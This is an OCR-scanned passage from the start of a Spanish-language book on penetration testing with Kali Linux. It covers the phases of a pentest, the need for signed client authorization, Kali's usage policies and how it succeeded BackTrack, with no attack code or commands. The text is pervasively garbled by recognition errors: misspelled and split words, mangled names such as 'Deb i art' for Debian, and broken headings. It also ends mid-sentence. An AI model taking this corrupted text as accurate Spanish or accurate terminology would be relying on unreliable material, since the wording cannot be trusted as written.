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Introduccion 


El  complejo  tnundb  de  la  seguridad  informal ica  presents  novedades  dia  a  dla  y  requiere  que  el 
auditor  o  pentester  se  encuentre  en  constantc  crecimiento  profesional.  Los  audi tores  de  seguridad 
suelen  disponer  de  un  kit  de  herramientas,  en  su  cajon  de  sastre  o  aplicaeiones  preferidas,  con  las 
que  realizar  sus  pmyectos 

A  nivel  m undial  BackTrack  cubria  un  gran  espectro  en  lo  que  herramienias  de  seguridad  sc  refiere, 
copando  3os  primeros  puestos  en  distribuciones  de  seguridad.  BackTrack  ha  dejado  una  hue!  la  en  la 
com  uni  dad  de  la  seguridad  m  undial  y  Kali  Linux  tiene  capacidad  para  eoger  dicho  relevo.  La  nucva 
distribueidn  que  sustituye  a  BackTrack  viene  implantada  sobre  un  si  sterna  Deb  i  art  y  con  la  limpieza 
de  herramienias  que  los  usuarios  solicitaban  desde  hace  ya  ahos. 


Aliora  es  mas  sencillo  encontrar  las  herraraientas  necesarias  para  cada  rama  del  pen  testing.  Kali 
Linux  ofrece  al  usuario  numerosas  aplicaeiones  para  todas  las  vias  del  pentesting  desde  la  rccoleccion 
y  analisis  de  informacion  hast  a  la  explotacidn  de  vulnerabilidades  de  sistemas,  web  o  Wireless, 
Adcmas,  se  dispone  de  herramientas  para  analisis  forense,  que  si  hien  no  es  una  rama  como  Lai  del 
pen  testing,  se  puede  considerar  una  rama  importante  de  la  seguridad  in  formal  ica. 


El  libro  llevara  al  lector  al  punto  de  vista  del  pentester  con  la  idea  de  introduce  rle  en  aspectos  teen i cos 
y  a  la  vez  escenificar  situaciones  reales  que  puedan  simplilicar  el  proceso  de  aprendizaje  del  lector. 
Las  pruebas  de  concepto  que  se  detallan  en  e!  libro,  como  se  ha  mencionado  anteriomiente,  son 
situaciones  y  escenarios  que  facitmenle  se  pueden  encontrar  en  empresas  y  organ izaci ones  durante 
el  proceso  de  pen  testing. 

Hay  que  tener  en  cuenta  que  el  libro  no  pretende  dctallar  o  explicar  cada  herramienta  que  se 
encuentra  en  la  distribucion  Kali  Linux ,  ya  que  este  hecho  itevaria  a  escribir  de  cada  capitulo  un 
libro  propio.  El  libro  pretende  dctallar  cada  parte  del  pentesting,  enumerar  las  aplicaeiones  para 
dicha  rama  y  detallan  mediante  la  exposition  de  cases  practices  o  pruebas  de  concepto,  algunas  de 
las  herramientas  imprescindibies. 


Como  curiosidad  final  indicar  que  Kali  Linux  proporciona  al  pentester  un  top  10  de  herramientas  de 
seguridad,  lascuales  se  pueden  llamar  las4'imprescindiblesde  Kali  Linux  \  Este  tipo  de  herramientas 
scran  tratadas  especialmente  en  el  libro  dotandolas  de  gran  cantidad  de  informacion. 


El  mundo  de  la  seguridad  inform&tica  reeibe  a  Kali  Linux  con  gran  expectation  y  esie  libro  llevara 
dicha  expectacidn  al  lector  el  cual  aprendera  tecnicas  de  auditoria  profesional  mediante  una  de  las 
mejores  distribuciones  de  seguridad  del  entomo  profesional 


Capitulo  1.  Pen  testing 


Capitulo  I 
Pentesting 
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Para  quienes  no  esten  familiarizados  con  este  termino,  los  test  de  intrusion  o  pentesting  evaluan 
los  niveles  de  seguridad  de  un  sistema  informatico  o  red  mediante  la  simulation,  en  un  entomo 
control  ado,  de  un  ataque  por  parte  de  un  usuario  malicioso  conocido  comunmente  como  hacker, 
Lo  cual  implica  un  proeeso  de  analisis  activo  del  sistema  en  busca  de  posibles  vulnerabilidades 
que  podrian  resultar  de  una  mala  o  iuadecuada  configuration  de  un  sistema,  defectos  en  software 
conocidos  o  no  (Zero-Days,  exploits  para  determinadas  productos,  etcetera)  o  un  fallo  de  seguridad 
en  un  sistema  operative  o  hardware 

Este  analisis  se  realiza  desde  la  position  de  un  atacante  potential,  y  puede  implicar  la  explotati6n 
activa  de  vulnerabilidades  de  seguridad.  Los  problemas  de  seguridad  que  se  encuentran  se 
presentarAn  al  propietario  del  sistema  junto  con  una  evaluation  del  impacto  que  supondna  dentro  de 
la  organizacidn,  ademas  de  una  propuesta  do  mitigation  o  una  solution  tecnica. 

El  propdsito  de  una  prueba  de  penetration  es  determiner  la  viabilidad  de  un  ataque  y  la  cantidad  de 
impacto  en  el  negocio  de  la  explotaeidn  exitosa,  si  se  descubfe.  La  mejor  manera  de  demostrar  la 
fuerza  de  una  defensa  es  tratando  de  penetrar  en  cl  la. 

Dado  que  las  pruebas  de  penetracidn  estan  disenadas  para  s similar  un  ataque  y  utilizar  herramientas 
y  tecnicas  que  pueden  ser  restringi  dos  por  la  ley.  las  regulaciones  federates,  y  la  pal  idea  de  la 
organization,  son  imprescindibles  para  obtencr  el  permiso  formal  para  la  realization  de  pruebas  de 
penetration* 

Este  permiso  debe  estar  previamente  acordado,  organ izado  y  plasmado  en  un  doeumento  fisico 
firm  ado  por  ambas  partes,  donde  se  indicaran  cuales  seran  las  pautas  a  seguir,  y  a  parti  r  de  aqul 
empiezan  a  entraren  juego  las  fases  de  un  test  de  intrusion,  que  sc  detallan  a  continuation. 


1.  Fases  de  un  test  de  intrusion 

A  la  hora  de  realizar  un  test  de  intrusion  se  pueden  ver  diferentes  etapas,  que  si  no  son  realizadas  en 
el  orden  eorrecto  podrian  dar  lugar  a  problemas  con  el  clients  que  pide  la  auditor! a,  ya  que  se  podria 
poneren  riesgo  el  entorno  de  production,  o  simplemente  sc  v ulneran  sin  permiso  los  derechos  de  la 
propiedad  intelectual  y  privada  de  la  organizacion  que  se  esta  poniendo  a  prueba* 
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Las  eta  pas  que  se  mencionaban  anteriormente  persiguen  objetivos  particu  lares  y  son  claramente 
diferenciables  una  de  otras.  Sin  embargo  si  bien  se  debe  dejar  elaro  sn  importance  individual 
tambien  es  eonvcniente  recordar  que  sc  persigue  un  objetivo  romun,  que  es  preservar  la  seguridad. 

Las  fases  del  test  de  intrusion  son  las  siguientes: 

Reglas  del  juego:  Alcan ce  y  tcrminos  del  test  de  intrusion, 

-  Recoleccidn  de  inform  ac  ion 

-  Analisis  de  las  vulnerabilidades. 

Explotacion  de  las  vulnerabilidades. 

-  Postexplotac i6n  del  sistema, 

Generacion  de  informes. 


A  conti nuacion  se  pasara  a  describir  eon  mayor  detail e  cada  una  de  la  fases  comentadas,  con  la 
intend  on  dc  que  aquellos  que  conoeen  el  tema  les  resulte  agradable  recordar  los  conceptos  que 
alguna  vez  adqnmeron,  y  para  qnienes  no  lo  conozcan  lo  encuentren  motivador  a  la  vez  de  didactico 
en  su  ambiente  de  trabajo  o  de  creeimiento  personal. 


Reglas  del  juego:  Alcance  y  terminus  del  test  de  intrusion 


Cuando  se  hace  referenda  a  las  reglas  del  juego  se  haee  un  si  mi  I  a  las  normas  que  rigen  cualquier 
aetividad  recreacional  donde  se  imponen  unos  limites  de  aecidn,  coma  podrla  ser  el  ajedrez,  donde 
las  piezas  tienen  un  determinado  tipo  de  movimiento  y  cantidad  de  desplazamienlo,  etcetera. 


El  caso  del pentesting  es  similar,  ya  que  al  inicio  de  toda  auditoria  se  debe  llegar  a  un  acuerdo  sobre 
I  os  objetivos  que  el  cliente  desea  aleanzarmedtante  el  test,  los  limites  a  los  que  se  veran  expuestos  el 
equipo  de  auditores.  es  decir,  el  ainbito  de  aecion,  ya  que  la  mformacidn  que  estara  a  su  disposition 
sera  totalmente  confidenciaL  Todo  lo  aeordado  debera  ser  recogido  en  un  documento  firm  ado  por 
ambas  partes  donde  se  declare  la  conformidad  con  los  responsables  del  proyecto.  Es  importante 
que  sea  de  esta  manera  ya  que  en  el  easo  de  que  alguna  de  las  partes  tenga  alguna  queja  o  reclamo 
en  relacion  a  las  vias  o  maneras  que  se  estan  adoptando  para  realizar  la  prueba,  siempre  se  podra 
recurrir  al  contrato  para  verificar  que  no  se  vulncra  ninguna  norma  alii  establecida, 

Normatmente  en  esta  etapa  e!  cliente  se  da  euenta  realmente  de  los  peligros  a  los  que  se  ve  expuesta 
su  organ izaeidn,  )  se  eoneiencia  sobre  la  necesidad  de  realizar  una  auditoria  de  seguridad  para 
preservar  sus  inlereses  cada  eierto  periodo  de  tiempo,  atendiendo  a  las  nuevas  y  novedosas  formas 
que  al  pasar  el  iiempo  van  encontrando  los  posibtes  atacantes  para  llegar  a  su  objetivo. 


Puede  ocurrir  que  el  cliente  quiera  delimiter  el  ambito  de  la  pnieba,  por  lo  que  se  incorporan  ciertas 
restricciones  al  test.  Lstas  restricciones,  siempre  y  cuando  vayan  por  contrato,  dehen  ser  lomadas 
muy  en  e  Jcnta  pur  parte  del  auditor,  ya  que  la  information  que  se  manejara  sera  confidenciaL 


Capitulo  1.  Pentesting 
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Recoleccion  de  informacion 

Sc  podria  dccir  quc  dsta  es  la  primera  etapa  puramente  prfictica,  dondc  cl  equipo  de  auditores  liari 
uso  de  las  kScnieas  de  Foof printings  Fingerprinting*  Google  Hacking,  entre  otras,  para  intentar 
obtener  la  mayor  cantidad  de  infoimacibn  sob  re  la  organizacidn  quc  sc  va  a  someier  al  test, 

Otras  vias  muy  comunes  de  localizar  informacion  es  en  redes  sociales  (a  dia  de  hoy  en  diclias  redes 
hay  mueha  mas  informacion  de  ]a  que  deberia  o  se  desearia),  mgenieria  social  a  los  trabajadores 
de  la  empresa.  o  simplemente  en  blogs  dedicados,  donde  no  simplemente  podrian  hablar  acerca  de 
elementos  de  3  a  empresa,  si  no  que  en  algun  caso  se  comentan  tambien  los  fallos  de  seguridad  que 
algun  usuario  inquieto  ha  logrado  descubrir  y  lo  publica  para  dar  a  conoeer  sus  dotes  artisticas  a  3a 
hora  de  acceder  a  los  si  stem  as  informat  icos  ajenos. 

No  seria  la  primera  vez  quc  una  auditoria  de  seguridad  empieza  y  acaba  en  un  blog,  donde 
posteriormente  sc  contrastan  los  resukados  y  sc  hari'an  las  comprobaciones  sobre  las  afirmaeiones 
que  alii  sc  comentan,  ahorrando  mueho  iiempo  en  exhaust ivas  busquedas  de  fallos. 

Todo  ello  Ueva  a  la  posibilidad  de  que  el  auditor  consiga  haccrse  eon  una  clara  iniagen  del  objetivo, 
saber  su  funcionam  lento,  coino  fue  concebido  e  incluso  saber  los  posibles  y  mas  comunes  fallos  de 
implementation  que  ocurren  a  la  hora  de  pasar  de  una  idea  de  proyecto  informatico  a  la  realidad. 
De  esla  nrnnera  se  podria  tenor  una  vision  amplia  de  los  tipos  de  commies  de  seguridad  existences  y 
por  ende  saber  eual  es  la  mejor  manera  de  atacar  a  la  victima  y  extraer  toda  la  informacion  que  sea 
posible  de  ella. 

Esto  ultimo  es  muy  importante  porque  si  se  conoce  la  forma  de  actuar  de  un  si  sterna  o  mecanismo  de 
protection  siempre  podria  pensarse  en  un  sistema  de  contramcdidas  para  burlarlo. 


Analisis  de  vulnerabilidades 


Despues  dc  recoleclar  toda  la  informacion  disponible  en  la  red  o  mediante  las  tecnicas  adecuadas, 
aun  queda  analizar  y  organizar  todos  los  resukados,  ya  que  a  partir  de  el  los  se  puede  derivar  el 
descubrimiento  de  agujeros  de  seguridad  y  con  todo  ello  se  podria  ya  planttiear  el  metodo  de  action 
o  ataque  que  mejor  se  adapte  a  la  situacion. 

En  esta  informacibn  recopilada  se  pueden  encontrar  diferentes  vulnerabilidades  existentes  en  el 
sistema.  Despues  de  ello  hay  que  realizar  un  modelado  con  toda  la  informacion  extraida,  y  tras  un 
breve  estudio  se  podria  determinar  el  ra^lodo  de  ataque  mas  eficaz  para  la  situacion,  simulando  los 
procedi mientos  que  tin  atacante  comun  rcalizaria  para  explotar  las  debilidades  en  la  seguridad  de  un 
sistema  victima. 


A  continuation  y  de  forma  conjunta  con  los  datos  recogidos  en  la  fase  anterior,  sc  identificardn 
las  vias  dc  action  con  mas  posi  h  i  I  idades  de  exito.  conform  an  dose  de  esta  manera  el  mejor  plan  de 
accidn,  para  poder  acceder  a  la  informacion  del  sistema. 
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B1  uso  de  escaneres  y  analisis  de  puertos,  enlrc  otros,  son  los  procedi mientos  habituates  en  esta 
etapa* 


txplotacion  de  las  vulnerabilidades 

Sc  podria  decir  que  por  fin  ha  llegado  la  fase  que  mas  entusiasmo  a  porta  a  los  auditores.  y  es  la  fase 
dc  romper  cosas  (inforrn&ticamente  hablando),  donde  los  auditores  basandose  en  la  info  rmae  ten 
recopilada  anteriormente  y  fundamentandose  en  su  experiencia  adquirida  despues  de  arduas  horas 
dc  irabajo  o  simplemente  lo  que  comiinmente  se  denomina  ^idea  feliz'\  logran  superar  las  barreras 
dc  seguridad  que  plantean  las  organ izaciones  dejando  en  descubierto  las  vias  por  ias  cuales  tin 
atacante  extemo  puede  hacerse  con  el  control  del  sistema  vfctima. 


Sin  embargo  no  todo  es  felicidad  en  esta  etapa,  ya  que  tambien  es  comun  caer  cn  la  cuenta  de  que 
si  hubo  errores  a  la  hora  de  recoger  la  informacion  en  los  pasos  previos.  en  esta  etapa  se  caera  en 
lalsos  positivos  que  no  solamente  perjudicaran  en  el  tiempo  utilizado  sino  que  tambien  poddan 
poner  en  tela  de  juicio  la  ve  rad  dad  o  fiabilidad  del  proceso  que  se  ha  empleado  para  realizar  dicha 
recoleccion  de  informacten,  y  con  lo  cual  se  pondria  en  riesgo  el  informe  posterior  que  se  querra 
presentar  al  cliente, 

Uno  de  los  elementos  mas  utilizado®  a  la  hora  de  querer  lomar  el  control  de  un  sistema  es  el  use  dc 
exploits,  lo  cual  generara  una  pregunta  en  alguno  de  los  lectures,  sobre  todo  en  los  que  descubren 
por  primera  vez  esta  palabra  ^Que  e$  un  exploit?  Pam  halter  la  respuesta  a  esta  interrogante  sc 
podria  ir  direclamenlc  a  la  propia  etimologia  dc  la  palabra  exploit  que  proviene  del  i  ngles  to  exploit, 
que  signifies  exploiar  o  aprovechar,  lo  cual  trasladandose  al  ambito  inform  at  ico  se  podria  concluir 
que  se  trata  de  un  con  junto  de  acciones,  codigos  o  secuencias  de  comando  con  los  cuales  se  quicrc 
aprovechar  o  exploiar  una  vulnerabilidad  dc  un  sistema  informatico  con  el  afan  de  conscguir  un 
eomponamtento  beneficioso  para  el  atacante,  o  lo  que  es  lo  mismo,  no  deseado  para  te  victima. 

Sin  embargo  es  verdad  que  un  hacker  puede  lanzar  todos  los  exploits  que  desee  sin  importarle  las 
consecuencias  que  con  dlo  origine  en  la  organization  que  esta  atacando,  pert)  d  equipo  de  auditores 
dedicados  al  hacking  etico  no  puede  permitirse  ese  lujo.  porque  debe  asegurarsc  en  todo  memento 
de  tener  el  control  dc  las  acetones  que  estan  realizando,  por  lo  que  solamente  deberia  ser  lanzado 
si  se  dispone  de  la  certeza  de  que  se  obtendra  un  resultado  positivo  en  la  prueba.  Es  por  ello  que, 
aunque  la  automatizacion  esta  muy  bien  vista  para  la  realization  de  labores  de  auditoria,  en  este 
caso  no  se  considers  una  buena  practica,  ya  que  el  uso  de  herramientas  para  realizar  el  lanzamiento 
automat izado  e  indiscriminado  de  exploits  y  aunque  results  beneficioso  en  tiempo,  easi  nunca  se 
posee  el  completo  conocimiento  de  lo  que  realtza  cada  uno  de  los  exploit  y  podria  generar  mas  dafios 
que  henefkios  al  sistema  testeado. 


La  unica  forma  de  que  una  automatizacion  sea  segura  es  lanzando  los  ataques  unicamente  sobre  las 
certezas  que  se  tengan. 
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Uno  de  las  herramientas  mas  populates  para  la  realizaeion  de  estas  labores  es  Metasploit  Framework, 
que  se  encuentra  en  cl  Top  Ten  de  las  herramientas  mas  utiiizadas  y,  oomo  no  podia  ser  de  otra 
man  era,  tambien  se  encuentra  ineluido  dentro  de  la  distribucidn  Kali  Linux, 


Postexplotacion  del  sistema 

Es  una  fase  muy  important©  en  lo  que  se  refiere  a  la  total i dad  del  test  de  intrusion,  y  llegados  a  esle 
puntp  del  test  se  supone  que  ya  se  posee  el  acceso  al  sistema  o  a  parte  dd  mismo,  sin  embargo  (jPor 
que  detenerse  o  conformarse  con  el  control  de  un  solo  equipo?  Se  supone  que  una  vez  que  se  obtiene 
e!  acceso  a  un  equipo  es  como  si  se  estuviese  fisicamente  dentro  de  la  red  institucional,  entonces... 
^que  impediria  a  un  supuesto  hacker  intentar  controiar  todos  y  cada  uno  de  los  equipos  de  la  red? 
^No  seria  interesante  hacerse  con  el  control  de  un  equipo  que  posea  un  nivel  de  importancia  muy  por 
encima  del  que  imcialmente  ha  si  do  controlado? 

Para  dar  un  ejemplo  claro  piensese  que  se  tiene  controlado  un  equipo  que  se  encuentra  en  la  misma 
red  de  uno  de  los  ordenadores  principals  de  la  organ  izacion.  Lo  primero  que  se  pensaria  es  que 
desde  esta  maquina  de  menor  nivd  se  podrta  auditar  a  dicha  maquina  con  mayor  peso,  localizando 
sus  puntos  dehilcs  y  dando  lugar  a  la  real  izacion  de  un  proceso  de  explore  ion  de  vulnerabilidades 
para  lograr  el  control  completo  de  dicho  sistema,  Sogrando  obtener  datos  interesantes  como  podrian 
ser  enemas  de  usuarios,  rutas  dc  acceso  a  dispositivos  de  almacenamiento  masivo  dc  la  empresa, 
etcetera. 

Conociendo  que  se  puede  hacer  este  tipo  de  infiltration  a  traves  de  un  primer  equipo  controlado,  se 
empieza  a  tener  la  certeza  de  que  se  puede  hacer  con  cualquier  equipo  de  la  organ  izacibru  realizando 
la  tecniea  comunmente  llamada  “ piwteo ”  es  decir.  saltando  de  un  equipo  a  olro  con  la  intention  de 
controiar  a  lodos  los  equipos  que  conforman  la  red  eorporativa. 


Generation  de  informes 

Esta  seria  la  ultima  fuse,  pero  no  carente  de  importancia  ya  que  es  considerada  la  parte  mas  Importante 
del  test,  y  es  donde  se  informa  al  cliente  sobre  cada  una  de  las  aeeiones  y  pruebas  que  se  Han 
realizado  y  los  result  ados  que  se  han  obtenido  en  cada  una  de  el  las,  documentando  todo  con  capturas 
de  pantalla,  recopilacion  dc  rutas  donde  se  han  enconlrado  parametros  vulnerable,  etcetera. 

Es  importante  que  despues  dc  realizar  cada  action,  esta  sea  debidamente  documcntada  y  no  esperar 
al  ultimo  memento,  ya  que  sinu  la  tarea  seria  mucho  mas  tediosa  e  incluso  podrian  pasarse  por  alto 
alguna  de  las  aeeiones  que  han  supuesto  el  descubrimiento  de  vulnerabilidades, 

Entire  tod  a  la  information  que  se  comente  en  el  documento  final  de  la  auditoria  dehe  incluirse 
cada  una  de  las  [areas  que  se  han  realizado  y  todas  las  teenicas  y  herramientas  utilizadas,  y  las 
formas  como  han  side  utilizadas,  adenias  del  tipo  de  vulnerabilidad  que  se  ha  descubierto  con  esa 
herramienta  y  el  nivel  de  gravedad  que  supone  para  la  seguridad  de  la  organ izaci&L 
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Por  otro  lado  es  bien  sabido  que  en  una  empresa  hay  Ira  baj  ad  ores  y  encargados  de  diferentcs  areas, 
y  no  necesariamente  un  alio  ejecutivo  o  director  de  empresa  ttene  que  Lener  conocimientos  teen i cos 
a  nivel  de  seguridad  como  I  os  de  un  auditor  m  active,  Es  par  ello  que  el  in  forme  resultanle  de  la 
auditoria  debe  tenor  dos  aspect  os  bien  dilerenciados  o  sirnplemente  ser  divide  en  dos  doeumentos: 
un  informe  tecnico  y  un  informe  ejecutivo, 

En  el  informe  tecnico  se  rccogcra  toda  la  in  formation  con  mucho  nivel  de  detalle,  es  decir,  la  lista  de 
vulnerabilidades  y  posibies  sol  uci  ones  que  aportara  el  equipo  de  auditores  y  quo  va  a  ser  leido  por 
profesionales  que.  a  I  inter  protar  los  doeumentos,  van  a  buscar  las  soluciones  adecuadas  para  paliar 
las  deficiencias  encontradas. 

En  eambio  en  el  informe  ejecutivo  se  deben  reportar  el  mismo  numero  do  vulnerabilidades  que  en  el 
informe  tecnico,  pero  sin  entrar  demasiado  en  detalle  para  que  se  entiendan  claramente  los  riesgos 
existentes  en  la  organization.  A1  igual  que  en  el  reporte  tecnico  tambien  deberia  comencr  una  lista 
de  reeomendaciones,  que  aunque  no  tenga  caracter  tecnico  haga  entender  al  cliente  la  necesidad  de 
subsanar  los  fallos  si  lo  que  se  desea  es  conservar  los  intereses  de  la  empresa. 


2.  Politicas  de  uso 


Kali  Unux ,  como  on  todo  sistema  informdtico  que  va  a  tenor  interaccidn  con  usuarios  finales*  debe 
tenor  unas  reglas  de  uso  para  mantener  unos  I  unites  hi  on  marcados,  para  que  do  osia  irismera  pueda 
perdurar  en  el  tiempo  y  ser  usado  por  cada  vez  mas  usuarios. 


Entrc  las  politicas  de  uso  disponibles  en  Kali  Linux  se  encuentran  las  siguientes 

-  Politics  de  codigo  abierto. 

Politica  de  Marcas. 

Politica  de  usuarios  Root. 

Politica  de  Herramientas  para  Pruebas  de  Penetracion. 

-  Politicas  de  Servicio  de  Red, 

Politicas  do  Act ualizaci ones  de  Seguridad. 


Una  vez  con ooi dos  los  tipos  de  politicas  disponibles  seria  convemcnie  conocerlas  un  poco  mas  a 
fbndo  para  garantizar  el  miximo  aprovechamiento  do  esta  distribution. 


Politica  de  c6digo  abierto 

Como  ocurria  con  Back  Track,  Kali  Unux  es  una  distribucion  con  miles  de  elementos  de  software 
libre,  y  como  ahora  esta  compldamente  basado  en  la  infraestructura  Debian,  cumple  con  los 
proloco  Ids  que  rigen  en  las  Ginas  de  Software  Libre  de  Debian. 


Capita  !o  /.  Pettiest  mg 
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La  gran  mayoria  de  desarrollos  espedficos  de  Kali  Linux  estan  hechos  a  medida  y  bajo  la  licencia 
GNU  GPL ,  Sin  embargo  existen  elementos  dentro  de  la  distribution  que  ban  si  do  desarrollados 
pur  entidades  privadas  pero  que  puedeti  distribute  de  forma  conjunta  con  Kali  Linux  dcbido  a  un 
acuerdo  con  Offensive  Security.  Si  se  quierc  iticluir  un  elcmcnto  privado  dentro  de  una  distribution 
derivada  de  Kali  Linux  se  deberia  revisar  ia  licencia  de  cada  paquete,  en  dehkm/copyright  o  en  fus>/ 
share/ihcfpuckage/copyright  si  ya  se  tiene  el  paquete  instalado  en  el  sistema. 

Politica  de  marcas 

Uno  de  los  objetivos  de  Kali  Linux  y  Offensive  Security  es  que  los  usuarios  no  se  eon  fun  dan  a  la 
hora  de  utilizar  productos  software,  sobre  todo  para  evitar  que  otras  personas  usen  el  nombre  de 
Kali  Linux  u  Offensive  Security  de  forma  fraudulenta.  Es  por  el  lo  que  se  intern  a  difundir  en  toda  la 
comimidad  e!  reconocimiento  de  las  marcas  que  represen Utran  a  los  productos  y  a  las  empresas  de 
dicha  agrupacion.  Algunas  de  las  marcas  registradas  son  las  siguientes: 

KALI  LINUX®  TRY  HARDER® 

I 

4l® 

A 

Imaged  OLD I:  Marcas  registrars  de  Offensive  Security  v  Kali  Linux. 


Politica  de  usuarios  root 

Los  admin  istradorcs  de  si  sterna  dcben  garantizar  que  de  forma  predeterminada  todos  los  usuarios 
utillcen  el  si  sterna  operative  cornu  usuarios  con  privilegios  limitados.  de  esta  forma  se  evitara  que 
los  propios  usuarios  danen  o  corronipan  el  sistema,  dotandolo  de  un  nivel  de  seguridad  adicional 
entre  usuario  y  sistema  operativo, 

Lo  mismo  ocurre  en  Kali  Linux  donde  los  usuarios  son  creados  por  defecto  con  privilegios  de 
superusuarioo  root ,  ya  que  es  un  sistema  donde  much  as  de  las  herramientas  deben  ser  ejccutadas 
con  privilegios  elevados.  Esto  exige  un  control  y  separacion  de  privilegios  de  usuarios  para  un  mejor 
mantenimientoy  administracidn  del  sistema, 

Politica  de  herramientas  para  pruebas  de  penetracidn 

En  el  mtmdo  de  la  informatica  constantemenfe  se  estan  creando  nuevas  herramientas  que  cumplen 
funciones  nuevas  o  quizas  real  Seen  de  manera  diferente  algo  que  ya  esta  creado  con  anterioridad,  y 


20 


Pentesting  con  Kali 


no  por  el  to  pueden  ser  consideradas  mejores  o  peores  herrarnientas  que  las  existentes,  ya  quo  eso 
queda  a  criterio  del  auditor  que  haga  uso  de  una  herramienta  determinada. 

Sin  embargo,  para  incluir  nuevas  herrarnientas  en  la  distribucidn,  el  equipo  do  Offensive  Security 
somete  d  nuevo  software  a  diferentes  pruebas  para  demostrar  que  tiene  ulilidad  practice,  que  cumple 
con  los  est&n  dares,  que  el  consumo  de  recursos  se  encuentra  dentro  de  los  mirgenes  permitidos,  que 
las  funciones  que  realiza  pueden  ser  llevadas  a  cabo  con  alguna  de  las  herrarnientas  disponibles  en 
la  distribucide,  etcetera. 

A 1  gun  as  herrarnientas  especificas  para  DOS  (Denegaeion  de  Servicio),  DDOS  (Denegacidn  de 
servicio  distribuida),  entre  otras  simi  lares  no  ban  si  do  incluidas  por  defecto  en  la  primera  version  de 
la  disiribucion.  aunque  los  usuarios  pueden  solicitor  nuevas  herrarnientas  a  traves  de  la  pagina  web  y 
en  la  seccidn  de  "rastreador  de  bugs5'  (bugs.kali.org).  Si  el  equipo  de  desarrollo  de  Offensive  Security 
considera  viable  la  propuesta  pueden  incluir  la  hermrnienta  solicitada  en  la  siguiente  version  para  de 
esta  manera  mejorar  cada  vez  mas  la  distribudon  de  Kali . 


Politicas  de  servicio  de  red 

Cuando  se  realiza  un  test  de  intrusion  lo  ultimo  que  se  pretende  es  que  se  detecte  la  presencia  de 
los  auditores  ya  que  seria  como  si  el  verdadero  hacker  fiiera  descubierto.  Por  esa  razdn  Kali  no 
pemiite  que  desde  el  exterior  se  cncuenure  algun  servicio  escuehando,  Ademds  cuenta  con  diferentes 
servicios  previamente  instalados  como  SSH  y  Apache  listos  para  ser  iniciados  de  forma  manual. 


Politicas  de  actualizaciones  de  seguridad 

Como  ocurre  con  la  mayoria  de  las  distribuciones  Linux  eventualmente  se  reciben  actualizaciones 
de  seguridad  que  hacen  que  la  version  sea  mas  completa  y  por  consecueneia  mas  util  para  quienes  lo 
usan.  En  d  case  de  Kali  Linux  es  igual  ya  que  al  basarse  integramente  en  Debiart  reeibira  todas  las 
notificaciones  correspondientes  a  la  distribudon  principal 

Sin  embargo  los  paquetes  modificados  en  Kali  no  sufrlran  modificaciones  en  dichas  actualizaciones. 
renovandose  cuando  d  equipo  de  Offensive  Security  y  especificamente  el  equipo  de  Kali  Linux  suba 
versiones  mejoradas  o  parches  de  seguridad  necesarios  para  aumentar  el  rendimsento  y  usabilidad 
de  la  version. 


3.^Por  que  Kali? 

Iras  poeo  mas  de  siete  afios  de  vida  de  la  distribudon  BackTrack  Linux  que  se  ha  ganado 
merecidamente  una  innumerable  cantidad  de  adeptos,  Offensive  Security  1 1  ego  a  la  dara  conclusion 
que  debia  darse  una  vuelta  de  tuerea  a  I  asunto  y  sacar  a  la  luz  una  nueva  genera  cion  de  distribuciones 
tolalmente  orientada  a  los  test  de  penetracion,  es  decir,  una  herramienta  de  uso  profesional  que  sirva 
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tie  la  forma  mas  complete,  eficaz  y  efieiente  a  los  audi  tores  de  seguridad  en  el  cumplimiento  de  su 
labor.  Todo  ello  avalado  per  la  experiencia  y  oonocimiento  en  la  materia  de  los  profesionales  que 
conforman  su  equipo,  y  que  a  lo  largo  del  tiempo  ban  llevado  a  BackTrack  haste  la  popularidad  que 
hoy  en  dia  suslenta. 

As i  que  tras  un  afio  trabajando  en  desarrollo,  pruebas  y  explotacion  de  forma  silenciosa  de  un 
nuevo  sistema  que  revolucione  el  entomo  tal  cual  se  conoce.  Offensive  Security  (Uniendo  fuerzas 
con  Rapid? f  desarrolladores  a  su  vez  de  la  conocida  herramienta  Metasploit  )  ha  dado  luz  verde  al 
lanzamiento  de  la  marea  Kali  Linux  ™,  uno  de  los  sistemas  de  pemesting  mas  avanzado,  robusto  y 
estable  hasta  la  fee  ha. 


The  quieter  you  become,  the  more  you  are  able  to  hear 


lmagen  0  L02:  Logotipo  oficial  de  Kali  Linux. 

Kali  Lima  LO  es  una  reestructuracion  mastva  de  BackTrack  5,  sin  embargo,  la  diferencia  sustancial 
de  esta  rtueva  distribucion  es  que,  ademas  de  no  llamarse  BackTrack  6.  se  eambia  el  entorno 
basado  en  Vhmtu  10.04  LTS  por  un  autentico  sistema  Debiaru  especificamente  en  la  distribucion 
Debiart  Wheezy  ^  lo  cual  ofrece  un  abanico  de  posibilidades  completamente  nuevo,  proporcionando 
compatibiltdad  a  mas  de  300  herramientas  para  realizar  labores  de  pentesting,  cumpliendo  los 
est&ndares,  las  polftieas  de  Debian  y  siguiendo  las  mejores  practieas  de  uso  en  dicho  entorno. 

Despues  de  un  analisis  de  uso  de  todas  las  herramientas  induidas  en  BackTrack,  se  ha  llegado  a  la 
conclusion  de  que  muchas,  o  no  funcionaban  eorrectamente  o  no  cumplian  con  los  estindares  de 
desarrollo  seguro. 
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Aunque  la mayoria  de  los  desarrotladores  lo  saben  y  se  entiende  que  !a  mayoria  de  la  gente  dedicada  a 
la  seguridad  in  format  ica  tambien  lo  debe  saber,  aim  hay  protesionales  que  no  encuentran  las  pa  la  bras 
adecuadas  para  dcfinir  lo  que  es  desarrollo  seguro  a  una  persona  que  carezca  de  conociraientos 
leenieos.  y  aunque  el  objetivo  de  este  tihro  es  guiar  a  los  usuarios  avanzados  a  sacar  el  mdximo 
provecho  a  la  nueva  distribuci6n  de  pentesting,  resulla  interesante  dejar  claro  dsle  concepto  para  no 
remmciar  en  ningun  memento  a  los  usuarios  que,  aunque  feta  sea  la  distribution  con  la  que  hagan 
su  primera  toma  de  contaeto  con  el  mundo  de  la  seguridad  y  auditorfa  inform&tica,  scan  capaces  de 
aprender  y  afianzar  conceptos  antes  de  entrar  en  este  mundo  de  la  seguridad  informatica, 

Cuando  se  hablu  de  desarrollo  seguro  se  refiere  a  la  creacion  de  productos  software  que  cumplan 
unlearn ente  con  las  labores  o  fines  por  las  cuales  ban  side  disefiados  y  desarrollados,  y  que  a  traces 
de  el  los  no  se  pueda  realizar  otra  actividad  dife rente,  maliciosa  o  que  atente  contra  la  seguridad  del 
equipo  donde  se  esta  ejecutando.  Por  ejemplo;  Una  pequefia  aplieacion  de  comandos  que  real  ice  una 
sum  a  de  dos  numeros  enteros  que  se  reciban  conto  parameiros,  no  debe  crear  tin  desbordamiento  de 
